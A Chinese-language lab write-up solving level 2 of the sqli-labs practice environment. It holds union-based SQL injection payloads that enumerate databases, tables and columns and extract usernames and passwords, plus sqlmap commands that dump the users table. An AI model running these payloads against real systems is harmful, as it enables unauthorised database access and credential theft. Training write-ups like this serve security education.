前言:
今天做第二关。
正文:
打开第二关页面如下:
(1)找注入点:
还是一样,试一下id,我上篇文章忘记说了,第一关是字符型,一开始判断注入类型,是字符型还是数字型,字符型就是id是一个字符串,如果是字符串的话,在数据库里就有一个单引号,这个时候再注入的时候就需要对SQL进行闭合,具体体现就是在id=1后面加个单引号。数字型就是在SQL语句中id=数字,然后在进行注入的时候,就不需要单引号闭合,如果闭合的话,就会一直报错。
这个时候输入以前的payload
?id=1'
?id=1''
都会报错。这个时候我们只需要把单引号去掉就行。
(2)找列
?id=1 order by 2
?id=1 order by 3
?id=1 order by 4
说明是3列。
(3)找数据库名
?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata
(4)找表名
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
(5)找列名
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
(5)找数据
?id=-1 union select 1,group_concat(username),group_concat(password) from security.users
用sqlmap跑一下:
sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1
sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 --dbs
sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 -D security --tables
sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 -D security -T users --column
sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 -D security -T users -C id,password,username --dump
本站资源均来自互联网,仅供研究学习,禁止违法使用和商用,产生法律纠纷本站概不负责!如果侵犯了您的权益请与我们联系!
转载请注明出处: 免费源码网-免费的源码资源网站 » sqli-labs(第二关)
发表评论 取消回复